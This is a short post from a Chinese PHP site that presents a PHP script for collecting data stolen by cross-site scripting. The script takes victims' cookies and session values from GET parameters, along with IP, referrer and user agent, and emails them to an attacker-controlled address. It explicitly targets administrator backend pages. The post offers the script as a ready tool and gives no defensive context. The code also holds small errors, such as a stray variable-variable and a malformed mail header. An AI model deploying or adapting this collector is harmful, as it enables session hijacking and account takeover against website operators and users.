xss配合php获取cookie和session的脚本

PHP中文网

發布： 2016-05-25 17:09:58

原創

1939 人瀏覽過

1. [代码][PHP]代码

<?php
$ip = $_SERVER[&#39;REMOTE_ADDR&#39;];
$to=&#39;xxx@yeah.net&#39;;
$referer = $_SERVER[&#39;HTTP_REFERER&#39;];
$cookie = $_GET[&#39;cookie&#39;]; 
$session = $_GET[&#39;session&#39;];
$agent = $_SERVER[&#39;HTTP_USER_AGENT&#39;];
$subject=&#39;远程XSS获取地址-域名：&#39;.$referer;
$body="<p> 远程管理员IP= ".$ip."<p> 访问时间=" . date(&#39;d-m-Y&#39;).
"<p> 后台地址=".$referer."<p> 浏览器类型=".$agent."<p> 当前页面地址=".$referer."<p> COOKIE信息=".$cookie."<p> Session信息=".$$session.&#39; &#39;.
$headers= &#39;MIME-Version: 1.0&#39; . "\r\n";
$headers.= &#39;Content-type: text/html; charset=utf-8&#39; . "\r\n";
$headers.="Cleanreport.com";
mail($to, $subject, $body, $headers);
?>

登入後複製

相關標籤：

php

來源：php.cn

上一篇：360通用防护过滤用户输入的数据，实现防注下一篇：php版筛选需要的文件

本網站聲明

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

作者最新文章